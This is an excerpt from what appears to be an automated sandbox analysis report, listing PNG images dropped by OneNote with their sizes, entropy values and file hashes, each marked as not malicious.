                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
